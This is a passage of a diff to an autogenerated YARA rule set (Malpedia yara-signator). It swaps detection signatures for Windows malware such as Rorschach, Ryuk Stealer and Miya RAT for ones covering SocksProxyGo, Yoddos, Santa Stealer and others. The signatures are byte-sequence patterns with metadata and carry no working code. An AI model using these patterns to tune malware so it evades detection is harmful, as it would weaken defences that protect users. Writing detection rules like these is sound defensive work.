+		$sequence_8 = { 8993b4010000 8d8398000000 e8???????? 8d9398000000 8b83b4010000 e8???????? 8bc3 }
+		$sequence_9 = { 8bcf 83e11f c1e106 8b048560f94c00 c644080401 57 e8???????? }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 1736704
 }
-rule MALPEDIA_Win_Rorschach_Auto : FILE
+rule MALPEDIA_Win_Socksproxygo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "11b24b2d-bfea-5a8c-988f-bea7ea32170c"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rorschach_auto.yar#L1-L134"
+		id = "ca75341b-6658-565f-95d6-74f231ce44e9"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksproxygo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.socksproxygo_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "3819d2826273a95ad95ce552fb76b197f4eb30ddd0b4d089208f0442591f4b17"
+		logic_hash = "dae101b13021abf8406ff6df83b23a76fef8534b33d21e36035ee793df6e14d3"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f30f6f440420 f30f6f0c28 660fefc8 f30f7f0c30 418d40f0 f30f6f440420 f30f6f0c28 }
-		$sequence_1 = { e8???????? 8885f6050000 b261 488d8d70050000 e8???????? 8885f7050000 33d2 }
-		$sequence_2 = { ff15???????? 85c0 7414 488b4c2438 4c8d442444 488d5570 ff15???????? }
-		$sequence_3 = { eb04 33c0 8bd8 b978110000 e8???????? 488bf8 48894540 }
-		$sequence_4 = { 488d4d28 e8???????? 884529 33d2 488d4d28 e8???????? 88452a }
-		$sequence_5 = { 488d8d00010000 e8???????? 88850f010000 33d2 488d8d00010000 e8???????? 888510010000 }
-		$sequence_6 = { e8???????? 488d8598070000 488985b80c0000 c6454069 b273 488d4d40 e8???????? }
-		$sequence_7 = { 48897820 488b05???????? 4833c4 488985f0020000 bae9030000 ff15???????? 488bf0 }
-		$sequence_8 = { e8???????? 8885d7060000 33d2 488d8dd0060000 e8???????? 8885d8060000 b26b }
-		$sequence_9 = { 8885f60b0000 b23c 488d8d300b0000 e8???????? 8885f70b0000 33d2 488d8d300b0000 }
+		$sequence_0 = { e9???????? 48ffc6 4c89d1 4889d7 488b542448 4885c9 0f84ec000000 }
+		$sequence_1 = { e9???????? 4c8b9424e8010000 0f1f00 4d85d2 742b 498b02 498b5a08 }
+		$sequence_2 = { eb08 488bb42420010000 48899424a0000000 4889b424a8000000 488bbc24a0000000 4885ff 7421 }
+		$sequence_3 = { eb3a 498b02 498b5a08 498b4a10 488b942408020000 488b3a 488b7208 }
+		$sequence_4 = { 90 488d05c3392300 0f1f00 e8???????? 488b942418010000 48895008 833d????????00 }
+		$sequence_5 = { c64424216b c744242200000203 66c74424260202 31c0 eb1a 440fb64c341d 418d1411 }
+		$sequence_6 = { 4989c0 4989ca 488b842420020000 41c6043805 b901000000 e9???????? 4983fb01 }
+		$sequence_7 = { e8???????? 488bac24f8000000 4881c400010000 c3 e8???????? e8???????? 4889c3 }
+		$sequence_8 = { 7331 488d05b4513000 4889d9 4889fb 4889f7 4c89c6 e8???????? }
+		$sequence_9 = { c7442464345c35c5 c7442467c5fab82a 31c0 e9???????? 488b9424a8000000 4885d2 b801000000 }
 
 	condition:
-		7 of them and filesize < 3921930
+		7 of them and filesize < 14221312
 }
-rule MALPEDIA_Win_Ryuk_Stealer_Auto : FILE
+rule MALPEDIA_Win_Unidentified_109_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5ce42c56-7196-5dab-bbf5-f82410a1858c"
+		id = "b6061e05-3237-58ca-ad8b-3aa8b32dd728"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ryuk_stealer_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_109"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_109_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "577b17a6c0c9d94113328d94349dd787eb11b2a9bf82279881b6744cc074e6ff"
+		logic_hash = "d68f70d66f63488c08e0a968d9091c8e5c1c07bcbe7d2942849c574944ebfcba"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96868,34 +97118,34 @@ rule MALPEDIA_Win_Ryuk_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bcb e8???????? 3bc7 7552 }
-		$sequence_1 = { 05???????? 50 8d85b4fdffff 50 e8???????? }
-		$sequence_2 = { 8bcb 0f44f2 42 8d7902 }
-		$sequence_3 = { 83f801 7410 83ff01 755d }
-		$sequence_4 = { 8a443706 3c2f 7404 3c2d }
-		$sequence_5 = { b9a0860100 f7f9 81c2f8240100 52 ff15???????? }
-		$sequence_6 = { 668945ec 8945ee 668945f2 8d45e0 50 }
-		$sequence_7 = { 81c2f8240100 52 ff15???????? 46 }
-		$sequence_8 = { e8???????? 99 b9a0860100 f7f9 81c2f8240100 52 ff15???????? }
-		$sequence_9 = { 75f4 a1???????? 8907 eb38 }
+		$sequence_0 = { 8bc8 d1e8 410bc1 83e101 41ffc8 894204 448bc9 }
+		$sequence_1 = { 488bd9 418bf9 498bf0 448bd2 b1e4 85d2 }
+		$sequence_2 = { 418bc8 0bcb 41c1c01e 418bd1 4123cb c1c205 0bc8 }
+		$sequence_3 = { 410fb7c0 6641ffc0 c644080433 664585c9 0f84e0000000 410fb7c0 6641ffc0 }
+		$sequence_4 = { ffc8 410f48c6 4585c0 7e38 4898 660f1f440000 493bc6 }
+		$sequence_5 = { 0fb6d2 83e27f 8d041a 3bc6 0f8742010000 85d2 7416 }
+		$sequence_6 = { 7453 85db 744b 48897c2430 0f1f4000 498d8ef8000000 488bd6 }
+		$sequence_7 = { 488945d0 488945d8 488945e0 488d4de8 498bd9 418bf6 4c8975f8 }
+		$sequence_8 = { 790a c705????????00000000 488d0dfaf80400 ff15???????? 85db 488b5c2420 7441 }
+		$sequence_9 = { 8bc1 448bc1 2bc6 03c2 413bc1 77de 03ca }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 723968
 }
-rule MALPEDIA_Win_9002_Auto : FILE
+rule MALPEDIA_Win_Webc2_Rave_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bbbd19a8-8d59-5fa3-924d-0a65e7bf4ff6"
+		id = "8b8abe54-80f5-58ec-90da-b83888b1df6b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.9002_auto.yar#L1-L337"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_rave_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "b28ab37244f22455bfd7ab977eaff5de257e54ee69c7d856b3cc5dc49768b368"
+		logic_hash = "af650f13ddb6ad439bdfa3dda339af75bc74ce9074c6268554058b1c377beaa8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -96907,60 +97157,32 @@ rule MALPEDIA_Win_9002_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2d00040000 f7d8 1bc0 23c2 }
-		$sequence_1 = { 68???????? ff15???????? 6a0a ff15???????? e9???????? }
-		$sequence_2 = { 89bef8030000 ff15???????? 8986fc030000 ff15???????? 898600040000 }
-		$sequence_3 = { 83c0fc 50 53 e8???????? }
-		$sequence_4 = { 03c3 8b00 5b ffd0 }
-		$sequence_5 = { 6a02 83c144 6800000040 51 }
-		$sequence_6 = { 8bc1 33c9 894808 894810 8910 c7400c01000000 }
-		$sequence_7 = { 57 8bf1 50 6801020000 c706???????? e8???????? 8d4604 }
-		$sequence_8 = { 2bd0 3bfa 760d 85c0 7504 }
-		$sequence_9 = { 6a02 ff15???????? 68???????? ff15???????? 6a00 6a00 6a00 }
-		$sequence_10 = { 0ac8 80c910 880e 8ac2 }
-		$sequence_11 = { 6a02 6a03 6a00 e8???????? }
-		$sequence_12 = { 8b5c2408 6bdb08 03c3 8b00 }
-		$sequence_13 = { 33c9 3bc8 1bd2 f7da 8915???????? }
-		$sequence_14 = { 682c010000 50 ffd3 3d02010000 }
-		$sequence_15 = { 51 e8???????? 6a06 6a01 6a02 e8???????? }
-		$sequence_16 = { 8b08 51 e8???????? 8b5714 }
-		$sequence_17 = { 8b460c 40 33d2 f77614 ff4610 }
-		$sequence_18 = { e8???????? 50 e8???????? 6a08 e8???????? }
-		$sequence_19 = { 46 c1ea06 8816 46 }
-		$sequence_20 = { 56 89442418 ff15???????? a820 }
-		$sequence_21 = { 8b01 ff5010 8b7614 ff4e0c }
-		$sequence_22 = { c7422c00000200 8b4648 c7402801000000 8b4648 }
-		$sequence_23 = { 742e 85f6 7419 0fb6da f683c1d4001004 7406 8816 }
-		$sequence_24 = { 7622 8b4558 83f805 7316 8a0b }
-		$sequence_25 = { 8b7c240c 57 8bf1 e8???????? 33d2 }
-		$sequence_26 = { 894608 ff15???????? 8d4c2414 885c243c ff15???????? 8bc6 8b4c2434 }
-		$sequence_27 = { 8b4648 689a000000 6a00 50 }
-		$sequence_28 = { 8d4c240c 8d542418 6a05 8944241c 51 }
-		$sequence_29 = { 8bf1 8b4610 57 33ff 897e08 }
-		$sequence_30 = { 8bf8 6a40 6800100000 57 6a00 ff15???????? 8d4df8 }
-		$sequence_31 = { c3 b8???????? c705????????772b0010 a3???????? }
-		$sequence_32 = { ff15???????? 8bf8 85ff 7529 ff15???????? 8b560c 52 }
-		$sequence_33 = { 8b5c247c 55 56 8bb4248c000000 57 8b3b 8b2e }
-		$sequence_34 = { 52 ffd5 c7460c00000000 8b460c }
-		$sequence_35 = { 6689bc5a80010000 83c30c 895c2424 e9???????? }
-		$sequence_36 = { 8b4e04 83c108 33f6 668931 66897102 89510c }
-		$sequence_37 = { ff15???????? 8bf8 6a40 6800100000 }
+		$sequence_0 = { 8dbc24b0040000 83c9ff f2ae 8b06 8d9424b0040000 f7d1 }
+		$sequence_1 = { 8b742410 8bc6 85f6 89442418 }
+		$sequence_2 = { f3ab 85db aa 7464 eb06 8b35???????? }
+		$sequence_3 = { 83c410 f3ab aa 8d8424a0020000 50 6804010000 }
+		$sequence_4 = { c784248800000001010000 66899c248c000000 89842498000000 8984249c000000 ffd7 8b542420 50 }
+		$sequence_5 = { 81fb00040000 c644241300 0f87b4000000 b980000000 33c0 8dbc242c010000 }
+		$sequence_6 = { 42 56 51 8915???????? }
+		$sequence_7 = { 8b8c2410020000 33c0 8bd0 83e20f 40 }
+		$sequence_8 = { aa ffd5 83c410 8d842490000000 8d8c24a8030000 }
+		$sequence_9 = { e8???????? 83c404 85c0 0f848d000000 33c9 33d2 894c2410 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Fakeword_Auto : FILE
+rule MALPEDIA_Win_Mediapi_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "83704e50-1dbd-5c9a-b83f-e831a9bf7880"
+		id = "93eb6857-89ab-509f-a3db-521b6138e920"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakeword"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fakeword_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mediapi"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mediapi_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "109b39226f4f475b4c3e023db9ba2c26fa6ab8a72ccbfd12335d1989ed05d36a"
+		logic_hash = "62d55dbda71843c208580e1ce14906c348dc561d976d6517a9642b390fe58aad"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96974,32 +97196,32 @@ rule MALPEDIA_Win_Fakeword_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 750d 381c08 7408 8bd1 8915???????? 8a0408 3ac3 }
-		$sequence_1 = { 89442418 33c0 8a07 50 }
-		$sequence_2 = { 03ce 0fbe540cd8 52 68???????? 50 ff15???????? 83c40c }
-		$sequence_3 = { 41 81f900010000 89448afc 7cd4 }
-		$sequence_4 = { 83e210 f3ab 80fa10 c684246c02000007 743d 8d442458 }
-		$sequence_5 = { 83f804 7519 56 6a07 8d442418 }
-		$sequence_6 = { 3a5418ff 750b 83f801 7459 3a5418fe 7453 40 }
-		$sequence_7 = { 8b6c2420 8b4c2430 8b5c2434 41 83c304 83f908 894c2430 }
-		$sequence_8 = { c3 8b4c241c 56 51 e8???????? 8b442414 }
-		$sequence_9 = { 85ff 7446 8b7010 8b042f 03fd 03f5 }
+		$sequence_0 = { 89c1 e8???????? 8045ff01 ebc3 }
+		$sequence_1 = { 4898 488d95c0010000 41b900000000 41b8d0470000 4889c1 488b05???????? ffd0 }
+		$sequence_2 = { 488b5510 884209 488b5510 0fb645ff 88420d }
+		$sequence_3 = { 8345fc01 837dfc3b 0f86cdfdffff 90 4883c420 5d c3 }
+		$sequence_4 = { 88420b 488b5510 0fb645ff 884207 90 4883c410 }
+		$sequence_5 = { 4889f1 ffd0 488b5b10 4885db 75dc 488d0d35600000 4883c428 }
+		$sequence_6 = { 0fb645db 0fb6c0 c1f802 83e00f 01d0 }
+		$sequence_7 = { 90 488d0506700000 8b00 4898 488d9540010000 41b810000000 }
+		$sequence_8 = { 8845de 0fb645db 0fb6c0 c1e006 89c2 0fb645dc 01d0 }
+		$sequence_9 = { 8b05???????? c1e010 4898 48394518 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 246784
 }
-rule MALPEDIA_Win_Miya_Rat_Auto : FILE
+rule MALPEDIA_Win_Unidentified_068_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b014bac2-07d1-5fef-bdcc-2e598306fac3"
+		id = "00ed8246-d247-5890-b70c-9dc2bd82550a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miya_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miya_rat_auto.yar#L1-L191"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_068"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_068_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "98cc52272c83937733d9eba2aa0b9bb5ed8cab147dbc386514a5033d544b9bd7"
+		logic_hash = "fa30d57049b9c1bba68e7061433a03b7496f06c6df4edaee3b08ded2533d6885"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97013,38 +97235,32 @@ rule MALPEDIA_Win_Miya_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f84fa0f0000 83ec08 0fae5c2404 8b442404 25807f0000 3d801f0000 750f }
-		$sequence_1 = { 0fbf45fc c9 c3 8bff 55 8bec 83ec18 }
-		$sequence_2 = { 68a00f0000 ff15???????? 6a00 6a00 6a00 6a06 6a01 }
-		$sequence_3 = { 7541 d9ec d9c9 d9f1 833d????????00 0f854c0d0000 }
-		$sequence_4 = { 5d e9???????? 8bff 55 8bec b8ffff0000 83ec14 }
-		$sequence_5 = { 8bc6 5e 5d c20400 e8???????? cc 56 }
-		$sequence_6 = { 8d642408 0f85c90f0000 eb00 f30f7e442404 660f2815???????? 660f28c8 660f28f8 }
-		$sequence_7 = { 75be ddd8 db2d???????? b802000000 833d????????00 0f85e00c0000 }
-		$sequence_8 = { 4889742418 57 4883ec20 488d05da910700 33f6 488901 488b4108 }
-		$sequence_9 = { e9???????? 488d8a48000000 e9???????? 488d8a40010000 e9???????? 488d8ab0010000 e9???????? }
-		$sequence_10 = { 4c8bc7 89742428 33d2 b9e9fd0000 4889442420 ff15???????? 0f10442450 }
-		$sequence_11 = { 4533c0 488bd6 488d4dc7 e8???????? 488b7ddf 4533e4 eb67 }
-		$sequence_12 = { 0f57c9 f30f7f4d40 488d4d40 e8???????? 488d4d40 e8???????? }
-		$sequence_13 = { 0f1145c7 4c8965d7 48897ddf 66448965c7 488d7160 48897597 44386168 }
-		$sequence_14 = { 0f57c0 488d5308 48890b 488d4808 0f1102 e8???????? 488d0588aa0600 }
-		$sequence_15 = { 90 44897608 488d0554590500 488906 488937 488d4dd7 e8???????? }
+		$sequence_0 = { 8d3403 8bd6 c1fa06 8bce 83e13f 6bc930 8b049518c94500 }
+		$sequence_1 = { 51 ff5008 ffb56cffffff e8???????? 59 8d8d2cffffff e8???????? }
+		$sequence_2 = { 894dfc 57 8bd1 33ff 53 8d8dfcfeffff e8???????? }
+		$sequence_3 = { 897de8 8945d8 8b458c 2b8564ffffff 8945dc 6a08 e8???????? }
+		$sequence_4 = { 85c9 7904 33c0 5d c3 ff7510 }
+		$sequence_5 = { 0fafc1 3bf0 7314 8bf8 b800080000 2bc1 c1e805 }
+		$sequence_6 = { 83bf304b000002 744d 8b4d1c 85c9 7422 8b473c 2b4744 }
+		$sequence_7 = { e8???????? 6a10 83faff 8d4f28 58 0f45c2 }
+		$sequence_8 = { b800080000 2bc2 c1e805 03c2 66894312 6a02 eb14 }
+		$sequence_9 = { 6a2a 8d4dcc e8???????? 57 ff75cc 8d4dec e8???????? }
 
 	condition:
-		7 of them and filesize < 1238016
+		7 of them and filesize < 862208
 }
-rule MALPEDIA_Win_Rcs_Auto : FILE
+rule MALPEDIA_Win_Yoddos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "88c200d0-341d-5e6f-ae92-f6d74505595f"
+		id = "10bd6a04-5d32-593e-bba9-9dd8c0a017eb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rcs_auto.yar#L1-L178"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yoddos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yoddos_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "3382bc9aa5e79b7f4a031deda04f3ba8bd2d1a1f1a24d3ec268d1e68154c00c2"
+		logic_hash = "2bcf30b4ceb2923df5d8477756a290466d01852078cc1f43ff184eee0a076cc3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97058,42 +97274,34 @@ rule MALPEDIA_Win_Rcs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c430 6aff 68???????? }
-		$sequence_1 = { 89442456 8944245a 8944245e 89442462 89442466 8944246a }
-		$sequence_2 = { ff15???????? 5f 5e 5d 5b 33c0 }
-		$sequence_3 = { 85ff 0f84d4000000 57 e8???????? }
-		$sequence_4 = { 40 68???????? 50 e8???????? 83c40c eb0d }
-		$sequence_5 = { 6a00 6880000000 6a01 6a00 6a05 }
-		$sequence_6 = { 83fd03 7c89 8b7c243c 33ed }
-		$sequence_7 = { 6a20 6a01 6a0a 6a11 ff5660 8bbedc000000 }
-		$sequence_8 = { 8bbedc000000 8bbf14120000 89da 81e2ffff0000 c1e204 }
-		$sequence_9 = { 89473c 8b7d08 8b37 81c6a1010000 }
-		$sequence_10 = { e8???????? 83c41c 8d4d80 83c8ff }
-		$sequence_11 = { c9 c3 55 89e5 81ec04020000 }
-		$sequence_12 = { 81f2be387d15 e9???????? 8be5 c1cead }
-		$sequence_13 = { 83fd02 7c2d 8b07 8d54300c 3b11 7350 03c6 }
-		$sequence_14 = { 898528f4fbff 8b86dc000000 833800 0f94c0 83e001 }
-		$sequence_15 = { 81f2d141ed35 f8 f5 d1ca }
-		$sequence_16 = { 817deca4000000 72c2 56 e8???????? }
-		$sequence_17 = { ffb56cf4fbff ffb584f4fbff ffb5a0f9fbff 8b86dc000000 8b5020 03905c020000 52 }
+		$sequence_0 = { e8???????? 034508 57 53 894508 8d85d0feffff 50 }
+		$sequence_1 = { e8???????? 59 59 50 ff75bc ff75b8 e8???????? }
+		$sequence_2 = { 83c44c 8d85bcf6ffff 50 8d85bcfaffff }
+		$sequence_3 = { c68530ffffff77 c68531ffffff77 c68532ffffff77 c68533ffffff2e }
+		$sequence_4 = { c645e374 c645e465 c645e546 c645e669 }
+		$sequence_5 = { 50 e8???????? 8d85c8feffff 50 e8???????? 83c410 }
+		$sequence_6 = { c645db54 c645dc45 c645dd4d c645de5c c645df43 c645e075 c645e172 }
+		$sequence_7 = { c645fa74 c645fb6c 885dfc c645e857 c645e953 c645ea32 c645eb5f }
+		$sequence_8 = { ffd7 8d8d58ffffff 8945fc 51 50 c68558ffffff49 c68559ffffff6e }
+		$sequence_9 = { 7e06 897db4 8945ac 8d8548feffff 50 }
 
 	condition:
-		7 of them and filesize < 11501568
+		7 of them and filesize < 557056
 }
-rule MALPEDIA_Win_Miniasp_Auto : FILE
+rule MALPEDIA_Win_Hyperssl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "dd001a5f-6edc-54d2-8944-1f96a2068de8"
+		id = "6f22636e-fb9b-5862-8e11-c3c097a8328b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miniasp_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hyperssl_auto.yar#L1-L220"
 		license_url = "N/A"
-		logic_hash = "d2281d1c5f13ba61fe4f1a7571230cd90a3ba2e219ba542805e8f7cc31494450"
+		logic_hash = "373cb8242b6edc99bdda77d7fa35bccbbf94de7d502bb63cf5e16d60e54a0b5d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -97105,32 +97313,46 @@ rule MALPEDIA_Win_Miniasp_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4de8 e8???????? 0fb6c0 85c0 742f 8b45e8 }
-		$sequence_1 = { 8a8d7bffffff 8808 8b4584 40 894584 8b4580 40 }
-		$sequence_2 = { 75ef 8b45a0 2b459c 894594 6800000010 ff7594 ff7510 }
-		$sequence_3 = { 8b45bc ffb0b4000000 8b45bc ffb088000000 8d4dfb e8???????? 8945fc }
-		$sequence_4 = { 8b45f0 ffb088000000 e8???????? 83c40c 837df800 7463 }
-		$sequence_5 = { 33c0 40 e9???????? 8b4510 25ffff0000 0fb7c0 8945b4 }
-		$sequence_6 = { 8b4dfc c6040820 8b45fc 40 8945fc }
-		$sequence_7 = { 7432 68???????? 8b45f8 ffb0e8000000 e8???????? 59 59 }
-		$sequence_8 = { 807ddf00 741f 8b45e0 8a4001 8845de 8b4de4 }
-		$sequence_9 = { 33c0 8b7df8 83c742 ab ab ab ab }
+		$sequence_0 = { 742a 8b4028 03c1 7423 56 57 b9???????? }
+		$sequence_1 = { 40 4f 75f2 5f 5e e9???????? }
+		$sequence_2 = { 0108 8b4830 3308 56 }
+		$sequence_3 = { 0101 014514 2bf3 8b5d0c c7472400000000 }
+		$sequence_4 = { 0108 3908 1bc9 f7d9 }
+		$sequence_5 = { e8???????? 33c0 40 5d c20c00 6a08 }
+		$sequence_6 = { 5d c20c00 6a08 68???????? e8???????? 8b450c }
+		$sequence_7 = { 8bc8 85c9 7436 8b413c 03c1 }
+		$sequence_8 = { 0105???????? 8d8d5cffffff 89855cffffff 898560ffffff }
+		$sequence_9 = { 5e e9???????? c3 55 8bec }
+		$sequence_10 = { 0108 894810 8b4830 3308 }
+		$sequence_11 = { 8a10 301401 8a10 301406 40 4f }
+		$sequence_12 = { 2bc8 2bf0 5f 8a10 }
+		$sequence_13 = { 0108 3310 c1c607 c1c210 }
+		$sequence_14 = { 0105???????? 8d558c 89458c 894590 }
+		$sequence_15 = { 33c9 46 2bc3 8944240c 8b5c241c 8d440c2c 0fb61c03 }
+		$sequence_16 = { 017e0c 8d4d08 e8???????? 5f }
+		$sequence_17 = { 01442428 8b442428 884500 45 }
+		$sequence_18 = { 016b08 897b04 5f 5e }
+		$sequence_19 = { 017e0c 395e10 740f ff7610 }
+		$sequence_20 = { 011d???????? 5f 8935???????? 5e }
+		$sequence_21 = { 017e0c 5f 8bc6 5e c20800 }
+		$sequence_22 = { 017e08 50 e8???????? ff0d???????? }
+		$sequence_23 = { 017e08 8bc3 e8???????? c20400 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 835584
 }
-rule MALPEDIA_Win_Tropidoor_Auto : FILE
+rule MALPEDIA_Win_Santa_Stealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8fc3955f-94d9-559f-8d24-ed4a0dad546e"
+		id = "698b58d7-3beb-5b12-b9ab-ea8db82a9446"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tropidoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tropidoor_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.santa_stealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.santa_stealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "0cca80e99bb2477fcd1d7242d291a5d298649d488754cf8d2858779b90f27265"
+		logic_hash = "0ee975510b7aa8f6c88f59ccf7386a44e723fcc4879e58b69b100521065bb285"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97144,32 +97366,32 @@ rule MALPEDIA_Win_Tropidoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b8d88010000 488b01 ff5010 488b8d80010000 e9???????? 6644897508 897510 }
-		$sequence_1 = { ff15???????? 0fb74c2420 b8b2070000 663bc8 731a ba01000000 }
-		$sequence_2 = { 488d9520020000 498bcf e8???????? 4d8b8598000000 4d85c0 0f84a2000000 ba04010000 }
-		$sequence_3 = { ffd0 85c0 7564 8b459c 83c0fe 413bc5 7725 }
-		$sequence_4 = { 488bcb ff15???????? 418bc4 4883c470 415e 415c 5f }
-		$sequence_5 = { ff15???????? e9???????? 8b542478 4c8d8510050000 c744243002000000 488d8db0000000 897c2428 }
-		$sequence_6 = { 33d2 41b801010000 e8???????? 418bc6 4d8d4c2410 4c8d1d75920300 41be04000000 }
-		$sequence_7 = { 83ff01 0f85d2000000 84c0 740a 458b949b3cb90a00 eb08 458b949b04b90a00 }
-		$sequence_8 = { 8b8c8220060200 4803ca ffe1 488b4c2430 418bc4 488b0cc1 48894c2458 }
-		$sequence_9 = { 4c8d4d40 4c8d052b630900 488d4db0 e8???????? 48897de0 488d45d0 4983fd10 }
+		$sequence_0 = { e9???????? 488d5640 4c89e1 44896c2458 4c897c2460 e8???????? 89c3 }
+		$sequence_1 = { 6644894114 488b4918 41c7422407000000 80796700 75b3 80796800 75ad }
